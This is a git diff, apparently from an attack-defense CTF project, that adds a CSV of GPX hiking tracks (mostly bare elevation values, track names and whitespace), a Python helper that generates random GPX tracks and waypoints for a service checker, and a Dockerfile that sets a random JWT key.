+ + +2395.39990234375 + + + +2403.199951171875 + + + +2408.39990234375 + + + +2426.60009765625 + + + +2443.800048828125 + + + +2451.60009765625 + +" +" + + + + + + + +2015-09-28 14:08:44 + + + +2255.87 + + +2261.64 + + +2264.52 + + +2275.1 + + +2291.44 + + +2291.44 + + +2296.25 + + +2297.69 + + +2317.88 + + +2326.05 + + +2330.85 + + +2360.65 + + +2372.19 + + +2384.21 + + +2392.38 + + +2407.28 + + +2446.21 + + +2460.63 + + +2485.63 + + +2489.95 + + +2497.64 + + +2500.53 + + +2504.37 + + +2511.1 + + +2517.35 + + +2515.43 + + +2508.7 + + +2501.97 + + +2505.81 + + +2514.95 + + +2517.35 + + +2526.48 + + +2530.81 + + +2536.1 + + +2538.98 + + +2543.79 + + +2545.71 + + +2545.23 + + +2546.19 + + +2543.31 + + +2541.38 + + +2539.94 + + +2541.86 + + +2545.23 + + +2556.76 + + +2560.61 + + +2567.82 + + +2574.07 + + +2576.95 + + +2590.41 + + +2582.24 + + +2575.51 + + +2563.97 + + +2550.51 + + +2547.63 + + +2550.03 + + +2549.07 + + +2550.03 + + +2551.48 + + +2551.0 + + +2550.03 + + +2548.59 + + +2547.63 + + +2543.31 + + +2541.38 + + +2536.1 + + +2529.37 + + +2521.19 + + +2516.87 + + +2508.7 + + +2510.14 + + +2514.47 + + +2516.87 + + +2512.06 + + +2503.41 + + +2500.05 + + +2496.68 + + +2489.47 + + +2484.18 + + +2458.71 + + +2443.33 + + +2405.84 + + +2393.82 + + +2383.73 + + +2373.63 + + +2358.25 + + +2327.49 + + +2324.12 + + +2319.8 + + +2312.11 + + +2296.25 + + +2293.36 + + +2289.52 + + +2289.52 + + +2260.68 + + +2253.47 + + +2251.54 +" +" + + + + + + +Garmin International + + + +Aktueller Track: 22 FEB 2014 12:39 + + + + + + +353.9 + + + +353.42 + + + +352.94 + + + +352.94 + + + +352.94 + + + +351.02 + + + +352.94 + + + +352.46 + + + +349.58 + + + +347.65 + + + +348.62 + + + +340.3671875 + + +340.73046875 + + +345.73 + + + +346.21 + + + +346.69 + + + +348.13 + + + +348.62 + + + +348.13 + + + +355.83 + + + +352.46 + + + +346.69 + + + +345.25 + + + +344.77 + + + +344.29 + + + +343.81 + + + +342.85 + + + +343.81 + + + +349.58 + + + +346.69 + + + +341.89 + + + +345.25 + + + +343.33 + + + +343.33 + + + +343.33 + + + +342.37 + + + +341.89 + + + +342.37 + + + +344.77 + + + +344.29 + + + +344.77 + + + +341.89 + + + +346.21 + + + +345.73 + + + +345.25 + + + +344.29 + + + +344.77 + + + +344.77 + + + +344.29 + + + +344.77 + + + +342.37 + + + +343.33 + + + +348.13 + + + +343.33 + + + +344.77 + + + +344.29 + + + +344.77 + + + +344.29 + + + +344.29 + + + +344.29 + + + +344.29 + + + +344.29 + + + +341.89 + +" +" + + + + + + + +Linie +Erfassung über BayernAtlas + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +28-JUL-15 14:49:20 + + + + + +1763.68 + + + +1787.71 + + + +1791.07 + + + +1795.4 + + + +1812.22 + + + +1820.87 + + + +1822.32 + + + +1830.01 + + + +1855.0 + + + +1883.36 + + + +1917.49 + + + +1953.06 + + + +1997.76 + + + +2035.25 + + + +2072.74 + + + +2149.16 + + + +2181.37 + + + +2226.07 + + + +2239.53 + + + +2238.09 + + + +2261.64 + + + +2282.79 + + + +2303.94 + + + +2339.02 + + + +2357.29 + + + +2390.46 + + + +2434.2 + + + +2485.15 + + + +2477.45 + + + +2484.18 + + + +2517.83 + + + +2531.77 + + + +2537.06 + + + +2621.65 + + + +2646.17 + + + +2676.45 + + + +2734.61 + + + +2771.14 + + + +2893.71 + + + +3063.86 + + + +3117.69 + + + +3085.01 + + + +3049.92 + + + +2992.72 + + + +2876.88 + + + +2849.48 + + + +2746.14 + + + +2679.81 + + + +2638.96 + + + +2620.21 + + + +2546.19 + + + +2520.71 + + + +2461.11 + + + +2451.02 + + + +2418.81 + + + +2377.0 + + + +2277.98 + + + +2233.76 + + + +2188.58 + + + +2113.6 + + + +2072.74 + + + +1994.39 + + + +1967.96 + + + +1929.98 + + + +1927.58 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Malpas-penjaroja-6000m-468hoch-185ab-540-260 + + + + + + +22.0 + + + +13.0 + + + +7.0 + + + +6.0 + + + +6.0 + + + +20.0 + + + +18.0 + + + +13.0 + + + +9.0 + + + +3.0 + + + +5.0 + + + +12.0 + + + +27.0 + + + +31.0 + + + +24.0 + + + +29.0 + + + +21.0 + + + +20.0 + + + +21.0 + + + +23.0 + + + +43.0 + + + +47.0 + + + +42.0 + + + +48.0 + + + +70.0 + + + +73.0 + + + +82.0 + + + +94.0 + + + +90.0 + + + +89.0 + + + +90.0 + + + +105.0 + + + +116.0 + + + +114.0 + + + +130.0 + + + +132.0 + + + +133.0 + + + +138.0 + + + +135.0 + + + +135.0 + + + +138.0 + + + +129.0 + + + +131.0 + + + +143.0 + + + +153.0 + + + +151.0 + + + +161.0 + + + +165.0 + + + +176.0 + + + +198.0 + + + +209.0 + + + +229.0 + + + +232.0 + + + +277.0 + + + +261.0 + + + +273.0 + + + +279.0 + + + +257.0 + + + +296.0 + + + +277.0 + + + +228.0 + + + +257.0 + + + +271.0 + + + +276.0 + + + +289.0 + + + +303.0 + + + +307.0 + +" +" + + +Le Brandou + +Monika Teusch - Community + + + + + +Le Brandou + + + +177.2014 + + +181.46751 + + +186.62779 + + +190.34917 + + +192.61247 + + +196.02367 + + +197.14293 + + +199.08238 + + +206.08592 + + +207.34496 + + +210.09374 + + +213.02599 + + +227.08934 + + +234.75133 + + +242.26195 + + +259.68462 + + +263.05772 + + +270.93614 + + +280.27513 + + +286.97752 + + +290.60857 + + +309.79137 + + +311.95049 + + +312.69408 + + +313.50127 + + +326.02672 + + +326.59044 + + +326.74748 + + +326.04112 + + +321.17162 + + +317.26683 + + +314.78905 + + +311.09764 + + +313.62547 + + +318.80162 + + +319.71733 + + +331.77977 + + +330.192 + + +314.03172 + + +323.16905 + + +308.49596 + + +298.46733 + + +296.49699 + + +290.39012 + + +290.6682 + + +288.94115 + + +305.82427 + + +310.01329 + + +307.94603 + + +327.34032 + + +336.74229 + + +351.11034 + + +362.26012 + + +361.26152 + + +360.54186 + + +355.21947 + + +357.6057 + + +365.78868 + + +364.50218 + + +362.1118 + + +361.76146 + + +378.91155 + + +385.10033 + + +396.60362 + + +399.72789 + + +414.92967 + + +420.12376 + + +422.47258 + + +434.94139 + + +431.61723 + + +437.19115 + + +436.18187 + + +443.65672 + + +443.09581 + + +453.13329 + + +454.95519 + + +464.44438 + + +486.5388 + + +503.78453 + + +505.60484 + + +507.02049 + + +520.77635 + + +520.07726 + + +492.72557 + + +475.13475 + + +468.66692 + + +466.11095 + + +464.10112 +" +" + + + + + + + +Linie + + + +749.6 + + +759.8 + + +756.9 + + +735.0 + + +733.6 + + +746.0 + + +748.4 + + +766.1 + + +769.1 + + +767.4 + + +766.1 + + +768.4 + + +784.8 + + +780.5 + + +784.0 + + +795.2 + + +796.7 + + +824.3 + + +812.8 + + +805.9 + + +807.0 + + +811.1 + + +827.0 + + +844.2 + + +847.4 + + +856.2 + + +879.6 + + +837.3 + + +841.3 + + +829.4 + + +836.4 + + +818.8 + + +820.9 + + +831.0 + + +823.7 + + +830.0 + + +851.7 + + +877.6 + + +884.5 + + +890.9 + + +881.3 + + +881.5 + + +858.7 + + +854.9 + + +808.8 + + +790.1 + + +740.4 + + +745.4 +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +826.0 + + + +857.0 + + + +865.0 + + + +867.0 + + + +899.0 + + + +920.0 + + + +930.0 + + + +938.0 + + + +953.0 + + + +969.0 + + + +971.0 + + + +980.0 + + + +997.0 + + + +1007.0 + + + +1008.0 + + + +1034.0 + + + +1038.0 + + + +1053.0 + + + +1065.0 + + + +1070.0 + + + +1119.0 + + + +1133.0 + + + +1137.0 + + + +1157.0 + + + +1154.0 + + + +1172.0 + + + +1188.0 + + + +1202.0 + + + +1208.0 + + + +1242.0 + + + +1248.0 + + + +1264.0 + + + +1264.0 + + + +1270.0 + + + +1274.0 + + + +1245.0 + + + +1251.0 + + + +1331.0 + + + +1328.0 + + + +1305.0 + + + +1289.0 + + + +1283.0 + + + +1256.0 + + + +1252.0 + + + +1245.0 + + + +1249.0 + + + +1251.0 + + + +1218.0 + + + +1203.0 + + + +1152.0 + + + +1119.0 + + + +1083.0 + + + +1050.0 + + + +1026.0 + + + +1001.0 + + + +972.0 + + + +965.0 + + + +972.0 + + + +970.0 + + + +973.0 + + + +975.0 + + + +950.0 + + + +947.0 + + + +938.0 + + + +930.0 + +" +" + + + + + + + + + +Timber Creek Overlook Trail + + + +1898.0 + + + + + +0.000000 + +1903.0 + + + + + +6.192211 + +1907.0 + + + + + +1.160248 + +1906.0 + + + + + +9.309174 + +1898.0 + + + + + +10.514221 + +1895.0 + + + + + +11.433136 + +1896.0 + + + + + +5.466370 + +1896.0 + + + + + +4.154602 + +1911.0 + + + + + +7.365967 + +1919.0 + + + + + +5.824463 + +1920.0 + + + + + +1.758850 + +1918.0 + + + + + +1.777771 + +1920.0 + + + + + +6.255005 + +1920.0 + + + + + +12.956909 + +1898.0 + + + + + +0.236816 + +1909.0 + + + + + +1.299438 + +1907.0 + + + + + +3.842896 + +1902.0 + + + + + +1.467651 + +1906.0 + + + + + +2.054443 + +1920.0 + + + + + +4.399902 + +1917.0 + + + + + +6.736328 + +1919.0 + + + + + +3.302979 + +1907.0 + + + + + +3.242065 + +1901.0 + + + + + +10.868164 + +1897.0 + + + + + +6.354980 + +1896.0 + + + + + +9.276245 + +1899.0 + + + + + +1.129150 + +1905.0 + + + + + +2.783203 + +1910.0 + + + + + +3.253906 + +1907.0 + + + + + +6.170654 + +1906.0 + + + + + +7.888672 + +1906.0 + + + + + +6.825684 + +1900.0 + + + + + +0.873779" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +!!2016-01-17 10:50:57 + + + + + +1310.41 + + + +1315.7 + + + +1317.14 + + + +1328.68 + + + +1340.22 + + + +1349.35 + + + +1363.29 + + + +1376.75 + + + +1397.41 + + + +1412.79 + + + +1425.77 + + + +1446.44 + + + +1458.46 + + + +1464.23 + + + +1507.97 + + + +1526.71 + + + +1541.13 + + + +1562.76 + + + +1584.87 + + + +1610.35 + + + +1633.42 + + + +1654.57 + + + +1674.75 + + + +1687.73 + + + +1698.31 + + + +1727.63 + + + +1743.97 + + + +1754.06 + + + +1780.5 + + + +1785.79 + + + +1788.19 + + + +1780.98 + + + +1774.73 + + + +1771.85 + + + +1770.89 + + + +1765.12 + + + +1762.23 + + + +1766.56 + + + +1772.81 + + + +1784.82 + + + +1809.34 + + + +1835.29 + + + +1851.16 + + + +1853.08 + + + +1852.12 + + + +1870.86 + + + +1884.32 + + + +1894.42 + + + +1895.38 + + + +1908.83 + + + +1931.91 + + + +1961.23 + + + +1984.78 + + + +2020.83 + + + +2015.06 + + + +2012.18 + +" +" + + + + + + +Garmin International + + + +2016-09-25-01 + + + + + + +1459.6 + + + +1458.9 + + + +1474.5 + + + +1473.9 + + + +1461.0 + + + +1468.6 + + + +1470.2 + + + +1476.8 + + + +1488.8 + + + +1515.8 + + + +1542.4 + + + +1546.9 + + + +1535.6 + + + +1549.7 + + + +1566.5 + + + +1576.2 + + + +1579.7 + + + +1588.5 + + + +1617.0 + + + +1629.8 + + + +1637.5 + + + +1638.8 + + + +1647.3 + + + +1655.8 + + + +1665.1 + + + +1674.9 + + + +1687.5 + + + +1647.1 + + + +1644.1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Fricktaler Chriesiwäg + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin Connect + + +Eiger - Mittellegi +Tb conditions sur l'arête jusqu'à 3900, délicates au dessus, franchement dangereuses dans la descente en face W --> héliportage à 3560m. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +BERGTOUR Falkenstein 1 + +Thomas Mitterer + + + + + + + + + +0.0 + + +4 + +0.0 + + +4 + +821.0 + + +5 + +820.0 + + +5 + +816.0 + + +6 + +815.0 + + +6 + +823.0 + + +6 + +825.0 + + +6 + +827.0 + + +6 + +829.0 + + +7 + +843.0 + + +8 + +847.0 + + +8 + +848.0 + + +7 + +855.0 + + +8 + +897.0 + + +8 + +908.0 + + +8 + +909.0 + + +8 + +925.0 + + +8 + +974.0 + + +8 + +1036.0 + + +9 + +1035.0 + + +9 + +1081.0 + + +8 + +1084.0 + + +9 + +1102.0 + + +8 + +1107.0 + + +9 + +1109.0 + + +9 + +1102.0 + + +9 + +1092.0 + + +9 + +1116.0 + + +9 + +1090.0 + + +9 + +1102.0 + + +10 + +1083.0 + + +10 + +1080.0 + + +10 + +1080.0 + + +10" +" + + +Rovine del Castelliere + + + + + + + + + +253.7 + + +254.20000625898817 + + +255.4000247949861 + + +269.80013215484894 + + +281.7998885813871 + + +287.60004478909093 + + +325.40002042568625 + + +335.70009937339313 + + +345.8 + + +383.2 + + +406.1000403292819 + + +421.9999580973406 + + +445.499959993864 + + +450.1998895268991 + + +458.10002471586347 + + +460.50012957251397 + + +495.2999159485697 + + +510.1 + + +516.2000601492776 + + +522.7999190209237 + + +527.0999220592705 + + +531.6999637703068 + + +535.1999590821633 + + +530.79993455529 + + +522.4999744518332 + + +517.399945306463 + + +510.5 + + +492.099645956834 + + +458.49997931656577 + + +462.2 + + +454.29998600971254 + + +427.1 + + +424.1 + + +421.9000290952781 + + +416.1000305545696 + + +394.6999582722566 + + +378.59996207197145 + + +359.499870923805 + + +329.0 + + +299.9 + + +294.9 + + +292.20002664898135 + + +275.999999927804 + + +266.2 + + +261.69989384429033 + + +259.20007256845247 + + +261.2999881875691 + + +259.19999339844577 + + +256.5 + + +252.20003808073108 + + +257.00004655445997 + + +262.6 + + +263.59998502591856 + + +263.90002861324166 + + +265.4999828101775 + + +256.9000011738655 + + +256.1 + + +255.39998836494073 + + +254.50000270693764 + + +248.59994909912413 +" +" + + +Tourenplanung am 19. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 19. Juli 2016 + + + +283.73221 + + +289.97216 + + +297.55826 + + +322.02305 + + +327.06739 + + +357.97557 + + +404.39024 + + +473.43194 + + +481.13997 + + +454.92361 + + +438.7275 + + +431.85537 + + +423.68928 + + +420.33158 + + +416.895 + + +408.03148 + + +394.38413 + + +382.65311 + + +372.15278 + + +361.04679 + + +353.61969 + + +349.86134 + + +346.05221 + + +334.64498 + + +336.8725 + + +329.74872 + + +319.66848 + + +309.3041 + + +306.12677 + + +301.97469 + + +302.30244 + + +308.14771 + + +301.98249 + + +297.01624 + + +287.50834 + + +284.92911 +" +" + + +Col de Fontbelle zur Crete de Geruen + +Ekkehard Domning + + + + + +Col de Fontbelle zur Crete de Geruen + + + +1314.55712 + + +1313.11639 + + +1315.14584 + + +1315.04237 + + +1321.46294 + + +1325.81608 + + +1331.23306 + + +1321.19768 + + +1327.12292 + + +1335.00086 + + +1339.89136 + + +1340.26263 + + +1345.41376 + + +1359.24854 + + +1354.21485 + + +1361.50425 + + +1364.78016 + + +1380.92504 + + +1391.6178 + + +1411.20698 + + +1409.5988 + + +1416.77261 + + +1424.15466 + + +1442.09397 + + +1459.98824 + + +1463.51423 + + +1470.21478 + + +1465.37591 + + +1467.79246 + + +1484.8776 + + +1502.79339 + + +1520.31508 + + +1520.79667 + + +1532.62933 + + +1548.89814 + + +1601.01995 + + +1632.50198 + + +1639.23807 + + +1655.53064 + + +1670.03521 + + +1670.99932 + + +1707.62885 + + +1708.22472 + + +1718.88572 + + +1726.33942 + + +1733.43821 + + +1730.31248 +" +" + + +KOMPASS Digital Map Track + + + + + + + +Heulantsch + + + + + + +1179.23 + + + +1179.83 + + + +1179.0 + + + +1179.29 + + + +1180.0 + + + +1180.05 + + + +1180.46 + + + +1180.13 + + + +1187.4 + + + +1198.46 + + + +1208.92 + + + +1227.4 + + + +1231.82 + + + +1251.95 + + + +1281.72 + + + +1301.71 + + + +1354.38 + + + +1380.71 + + + +1417.4 + + + +1439.89 + + + +1443.99 + + + +1444.08 + + + +1440.64 + + + +1441.14 + + + +1458.64 + + + +1447.88 + + + +1441.05 + + + +1445.15 + + + +1442.34 + + + +1426.36 + + + +1391.97 + + + +1322.69 + + + +1294.93 + + + +1272.75 + + + +1253.04 + + + +1240.48 + + + +1226.75 + + + +1220.04 + + + +1213.6 + + + +1205.67 + + + +1197.87 + + + +1197.32 + + + +1184.19 + + + +1179.89 + + + +1179.03 + + + +1180.0 + + + +1180.0 + + + +1180.36 + + + +1179.0 + + + +1179.56 + + + +1179.08 + + + +1179.97 + +" +" + + +Route created on plotaroute.com + + + + + +Unnamed Route + + + +-32768.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 + + +0.0 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +robion ab + + + + + +OruxMaps + + + +robion ab +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: robion ab</h2><br /><p>Startzeit: 11/25/2015 15:01</p><p>Zielzeit: 11/25/2015 16:37</p><p>Strecke: 5,7km (01:35)</p><p>Bewegungszeit: 01:20</p><p>Ø-Geschwindigkeit: 3,6km/h</p><p>Netto-Geschwindigkeit: 4,3km/h</p><p>Max. Geschwindigkeit: 7,5km/h</p><p>Minimale Höhe: 715m</p><p>Maximale Höhe: 1656m</p><p>Steig-Geschw.: 287,8m/h</p><p>Sink-Geschw.: -633,6m/h</p><p>Aufstieg: 25m</p><p>Abstieg: -940m</p><p>Steigzeit: 00:05</p><p>Sinkzeit: 01:29</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1656.52 + + + +1641.06 + + + +1630.93 + + + +1609.96 + + + +1578.96 + + + +1568.43 + + + +1540.02 + + + +1533.52 + + + +1523.81 + + + +1517.47 + + + +1511.05 + + + +1487.93 + + + +1465.99 + + + +1448.52 + + + +1427.56 + + + +1397.56 + + + +1376.24 + + + +1370.06 + + + +1355.88 + + + +1361.96 + + + +1330.48 + + + +1315.91 + + + +1305.93 + + + +1280.67 + + + +1241.96 + + + +1241.37 + + + +1237.77 + + + +1215.43 + + + +1178.97 + + + +1166.56 + + + +1154.67 + + + +1121.42 + + + +1118.97 + + + +1078.05 + + + +1054.14 + + + +1045.9 + + + +1036.3 + + + +1037.34 + + + +1017.45 + + + +998.41 + + + +992.9 + + + +979.66 + + + +967.81 + + + +961.9 + + + +936.15 + + + +932.78 + + + +905.43 + + + +902.01 + + + +889.77 + + + +872.81 + + + +851.9 + + + +844.93 + + + +845.67 + + + +818.56 + + + +780.93 + + + +809.43 + + + +794.03 + + + +748.81 + + + +738.31 + + + +726.93 + + + +720.3 + + + +717.43 + + + +723.65 + + + +726.4 + + + +741.9 + +" +" + + + + + + + +Track 11.11.2015 - Rigi Hochflue + + + +1070.08 + + +1134.01 + + +1137.38 + + +1145.55 + + +1154.2 + + +1161.41 + + +1170.06 + + +1179.67 + + +1199.38 + + +1201.3 + + +1196.5 + + +1204.19 + + +1218.61 + + +1234.47 + + +1242.16 + + +1270.04 + + +1285.42 + + +1310.9 + + +1351.27 + + +1373.38 + + +1366.65 + + +1378.67 + + +1392.13 + + +1396.93 + + +1402.7 + + +1416.64 + + +1424.81 + + +1432.02 + + +1468.55 + + +1528.15 + + +1558.43 + + +1575.74 + + +1596.89 + + +1617.07 + + +1632.46 + + +1659.85 + + +1695.9 + + +1694.94 + + +1697.83 + + +1692.54 + + +1686.29 + + +1679.56 + + +1669.95 + + +1633.9 + + +1626.69 + + +1571.89 + + +1545.94 + + +1520.46 + + +1499.79 + + +1474.8 + + +1465.67 + + +1463.26 + + +1445.48 + + +1436.83 + + +1421.45 + + +1398.37 + + +1384.92 + + +1370.98 + + +1359.92 + + +1317.14 + + +1303.69 + + +1298.4 + + +1282.06 + + +1286.38 + + +1283.02 + + +1280.61 + + +1273.88 + + +1250.33 + + +1236.87 + + +1217.65 + + +1192.17 + + +1188.81 + + +1171.98 + + +1158.05 + + +1159.97 + + +1155.16 + + +1151.8 + + +1148.43 + + +1142.18 +" +" + + + + + + +Garmin Connect + + +Niederbauen Chulm ( 1923m ) & Gütsch ( 1884m ) 24.10.2015 + + + +1544.4000244140625 + + + +1546.199951171875 + + + +1556.800048828125 + + + +1566.4000244140625 + + + +1564.800048828125 + + + +1571.199951171875 + + + +1571.0 + + + +1576.4000244140625 + + + +1578.800048828125 + + + +1602.5999755859375 + + + +1605.4000244140625 + + + +1614.4000244140625 + + + +1624.5999755859375 + + + +1657.199951171875 + + + +1662.0 + + + +1693.0 + + + +1698.0 + + + +1716.5999755859375 + + + +1715.0 + + + +1738.5999755859375 + + + +1734.4000244140625 + + + +1772.800048828125 + + + +1823.199951171875 + + + +1837.5999755859375 + + + +1859.199951171875 + + + +1872.5999755859375 + + + +1886.800048828125 + + + +1888.0 + + + +1889.4000244140625 + + + +1881.4000244140625 + + + +1885.800048828125 + + + +1869.199951171875 + + + +1859.4000244140625 + + + +1854.5999755859375 + + + +1855.5999755859375 + + + +1826.800048828125 + + + +1810.4000244140625 + + + +1726.800048828125 + + + +1705.199951171875 + + + +1654.5999755859375 + + + +1613.0 + + + +1609.199951171875 + + + +1608.800048828125 + + + +1596.0 + + + +1597.800048828125 + + + +1588.4000244140625 + + + +1583.5999755859375 + + + +1579.0 + + + +1575.800048828125 + + + +1570.199951171875 + + + +1565.5999755859375 + + + +1560.0 + + + +1547.0 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +2024.0 + + + +2034.0 + + + +2013.0 + + + +2013.0 + + + +2027.0 + + + +2041.0 + + + +2054.0 + + + +2069.0 + + + +2093.0 + + + +2102.0 + + + +2115.0 + + + +2162.0 + + + +2178.0 + + + +2212.0 + + + +2219.0 + + + +2237.0 + + + +2254.0 + + + +2265.0 + + + +2274.0 + + + +2314.0 + + + +2325.0 + + + +2322.0 + + + +2319.0 + + + +2327.0 + + + +2347.0 + + + +2379.0 + + + +2394.0 + + + +2400.0 + + + +2438.0 + + + +2461.0 + + + +2506.0 + + + +2554.0 + + + +2612.0 + + + +2632.0 + + + +2667.0 + + + +2684.0 + + + +2744.0 + + + +2766.0 + + + +2748.0 + + + +2785.0 + + + +2748.0 + + + +2687.0 + + + +2727.0 + + + +2787.0 + + + +2729.0 + + + +2656.0 + + + +2624.0 + + + +2613.0 + + + +2556.0 + + + +2467.0 + + + +2425.0 + + + +2415.0 + + + +2394.0 + + + +2364.0 + + + +2340.0 + + + +2319.0 + + + +2307.0 + + + +2285.0 + + + +2273.0 + + + +2273.0 + + + +2249.0 + + + +2217.0 + + + +2204.0 + + + +2181.0 + + + +2143.0 + + + +2108.0 + + + +2024.0 + +" +" + + + + + + + + + +Gooseneck Lockout + + + +1440.0 + + + + + +0.000000 + +1439.0 + + + + + +2.397728 + +1441.0 + + + + + +7.760750 + +1452.0 + + + + + +9.942017 + +1458.0 + + + + + +4.994385 + +1464.0 + + + + + +7.079712 + +1464.0 + + + + + +3.648956 + +1466.0 + + + + + +1.642639 + +1464.0 + + + + + +8.596558 + +1463.0 + + + + + +2.645508 + +1460.0 + + + + + +8.176697 + +1453.0 + + + + + +6.428833 + +1443.0 + + + + + +9.906738 + +1440.0 + + + + + +1.986694" diff --git a/checkers/explorers/gpxhelper.py b/checkers/explorers/gpxhelper.py new file mode 100644 index 0000000..77c5364 --- /dev/null +++ b/checkers/explorers/gpxhelper.py @@ -0,0 +1,106 @@ +import csv +import datetime +import os.path +import random +from collections import namedtuple +from dataclasses import dataclass + +import gpxpy + + +@dataclass +class WaypointParams: + name: str + description: str + sym: str = 'Flag, Blue' + + +Point = namedtuple("Point", "lat lon ele time") + + +class TrackHelper: + def __init__(self): + self.gpx_raw_files = [] + with open(os.path.join(os.path.dirname(__file__), 'gpx_ds_small.csv')) as f: + reader = csv.reader(f) + for row in reader: + self.gpx_raw_files.append(row[0]) + + def random_point(self) -> Point: + lat = random.randint(575700, 660800) / 10000 + lon = random.randint(278400, 1325900) / 10000 + return Point(lat, lon, random.randint(500, 800), + datetime.datetime.now() - datetime.timedelta(days=random.randint(-1000, 1000))) + + def random_gpx(self, creator: str, num_points=10, waypoints: list[WaypointParams] = None): + start = self.random_point() + out_points = [gpxpy.gpx.GPXTrackPoint(latitude=start.lat, longitude=start.lon, elevation=start.ele, + time=start.time)] + for i in range(num_points): + prev_point = out_points[-1] + latitude, longitude = prev_point.latitude + random.randint(-1, + 1) / 1000, prev_point.longitude + random.randint( + -1, 1) / 1000 + elev = prev_point.elevation + random.randint(-10, 10) / 10 + time = prev_point.time + datetime.timedelta(seconds=random.randint(5, 30)) + out_points.append( + gpxpy.gpx.GPXTrackPoint(latitude=latitude, longitude=longitude, elevation=elev, time=time)) + wp_out = [] + for wp in waypoints or []: + point = random.choice(out_points) + wp_out.append(gpxpy.gpx.GPXWaypoint( + latitude=point.latitude, + longitude=point.longitude, + elevation=point.elevation, + name=wp.name, + description=wp.description, + symbol=wp.sym, + time=point.time + )) + + return self._generate_gpx(creator, out_points, wp_out) + + def random_gpx_from_ds(self, creator: str, waypoints: list[WaypointParams] = None): + gpx_file = random.choice(self.gpx_raw_files) + parsed = gpxpy.parse(gpx_file) + points = [point + for track in parsed.tracks + for segment in track.segments + for point in segment.points + ] + while len(points) < 1: + gpx_file = random.choice(self.gpx_raw_files) + parsed = gpxpy.parse(gpx_file) + points = [point + for track in parsed.tracks + for segment in track.segments + for point in segment.points + ] + wp_out = [] + for wp in waypoints or []: + point = random.choice(points) + wp_out.append(gpxpy.gpx.GPXWaypoint( + latitude=point.latitude + 0.0001, + longitude=point.longitude + 0.0001, + elevation=point.elevation, + name=wp.name, + description=wp.description, + symbol=wp.sym, + time=point.time + )) + return self._generate_gpx(creator, points, wp_out) + + def _generate_gpx(self, creator: str, points: list[gpxpy.gpx.GPXTrackPoint], + waypoints: list[gpxpy.gpx.GPXWaypoint]): + gpx = gpxpy.gpx.GPX() + gpx.creator = creator + + gpx_track = gpxpy.gpx.GPXTrack() + gpx.tracks.append(gpx_track) + gpx_segment = gpxpy.gpx.GPXTrackSegment() + gpx_track.segments.append(gpx_segment) + + gpx_segment.points = points + gpx.waypoints = waypoints + + return gpx.to_xml(prettyprint=True) diff --git a/checkers/requirements.txt b/checkers/requirements.txt index 37c845f..fa2868e 100644 --- a/checkers/requirements.txt +++ b/checkers/requirements.txt @@ -1 +1,2 @@ checklib +gpxpy diff --git a/services/explorers/Dockerfile b/services/explorers/Dockerfile new file mode 100644 index 0000000..f34e662 --- /dev/null +++ b/services/explorers/Dockerfile @@ -0,0 +1,15 @@ +FROM python:3.11-slim-bullseye + +RUN apt update && apt install -y xxd +WORKDIR /app +ADD src/requirements.txt requirements.txt + +RUN pip3 install -r requirements.txt + +COPY app.env app.env + +RUN sed -i "s/JWT_KEY=.*/JWT_KEY=$(xxd -u -l 20 -p /dev/urandom)/g" app.env + +COPY src . + +CMD python3 main.py \ No newline at end of file diff --git a/services/explorers/app.env b/services/explorers/app.env new file mode 100644 index 0000000..c263825 --- /dev/null +++ b/services/explorers/app.env @@ -0,0 +1,3 @@ 